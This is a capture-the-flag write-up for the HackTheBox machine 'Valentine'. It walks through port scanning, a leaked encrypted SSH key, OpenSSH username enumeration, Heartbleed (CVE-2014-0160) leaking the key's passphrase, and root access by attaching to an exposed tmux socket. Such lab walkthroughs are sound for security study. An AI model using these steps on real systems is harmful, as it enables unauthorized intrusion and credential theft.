Contents

๐Ÿ•ต HTB-Writeup : VALENTINE

SYNOPSIS

Valentine is a very unique medium difficulty machine which focuses on the Heartbleed vulnerability, which had devastating impact on systems across the globe.

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
โ””โ”€$ nmap 10.10.10.79 -T5 -p- -sV -A -Pn 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-15 12:53 CEST
Warning: 10.10.10.79 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.79
Host is up (0.040s latency).
Not shown: 65197 closed tcp ports (conn-refused), 335 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_ssl-date: 2022-09-15T10:56:26+00:00; 0s from scanner time.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We face a Linux machine with a http & https server and a SSH server.

dirbuster

Running a dirbuster scan, we found some files.

drawing

Result of the dirbuster scan

We found a base64 encoded private key from http://10.10.10.79/dev/hype_key.

1
2
3
4
5
6
7
8
9
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
[...]
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Maybe that private key is the one configured on the SSH server. If so we can use it to connect into the SSH server.

Finding vulnerabilities

Running a searchsploit with the SSH version, we found that it is vulnerable to user enumeration.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
โ””โ”€$ searchsploit ssh 5.9                               
--------------------------------------------------------------- ---------------------------------
 Exploit Title                                                 |  Path
--------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                       | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                 | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                   | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                         | linux/remote/45001.py
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading       | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                           | linux/remote/45939.py
--------------------------------------------------------------- ---------------------------------

Get the username

First I need to find the user that owned the key. The file’s name is hype_key. I tried the exploit with the username hype.

1
2
โ””โ”€$ python2 45939.py 10.10.10.79 hype      
[+] hype is a valid username

We got our user hype !

Trying to connect into SSH

We have a key, a user, let’s try to connect into the SSH server!

1
2
โ””โ”€$ ssh -i tmp/hype hype@10.10.10.79 
Enter passphrase for key 'tmp/hype': 

But we are asked for the passphrase of the key that we don’t have.

I tried to bruteforce the passphrase using john.

1
2
3
4
5
6
7
โ””โ”€$ ssh2john hype > hash

โ””โ”€$ john --wordlist=/usr/share/wordlists/rockyou.txt hash       
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
0g 0:00:00:04 DONE (2022-09-15 16:16) 0g/s 3266Kp/s 3266Kc/s 3266KC/sa6_123..*7ยกVamos!
Session completed.

I was unable to recover the pass.

SSL Vulnerability

Running nmap scripts, we found that the OpenSSL version used by the server is vulnerable to Heartbleed

1
2
3
4
5
6
7
8
โ””โ”€$ nmap 10.10.10.79 --script "vuln" -p 22,80,443
[...]
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability ...
|     State: VULNERABLE
|     Risk factor: High
[...]

Heartbleed vulnerability allow an attacker to leak some informations via crafted packets that trigger a buffer over-read.

I tried to exploit Heartbleed using scripts found on github. I found, thanks to this script, a string from the memory.

1
2
3
4
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==R..c]......-m.h....V

It is a base64 encoded string which gives the string heartbleedbelievethehype. I tried to connect into SSH server using hype:heartbleedbelievethehype but it didn’t work.

First shell as hype

Then, I retried to connect using the private key that we found earlier using heartbleedbelievethehype as passphrase.

1
2
3
4
โ””โ”€$ ssh  -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i tmp/hype hype@10.10.10.79

hype@Valentine:~$ cat user.txt 
*************************a4b2f4c

We got our first shell ! We can get the user flag :)

Path to the privesc

Searching on the home directory, we found some command on the .bash_history file.

1
2
3
4
5
6
7
8
hype@Valentine:~$ cat .bash_history 

tmux -L dev_sess 
tmux a -t dev_sess 
tmux --help
tmux -S /.devs/dev_sess 
[...]
tmux -S /.devs/dev_sess 

We found some tmux commands. Trying the last and we are prompted on a root shell!

1
2
3
4
5
6
hype@Valentine:~$ tmux -S /.devs/dev_sess

root@Valentine:/home/hype# id  
uid=0(root) gid=0(root) groups=0(root)
root@Valentine:/home/hype# cat /root/root.txt
**************************9db6a0

We can get the root flag :)

Tags

External, SSL, Penetration Tester Level 2, CVE Exploitation, CVE-2014-0160, A06:2021-Vulnerable And Outdated Components, Public Vulnerabilities, Weak Permissions, CVE-2016-5195, Session Handling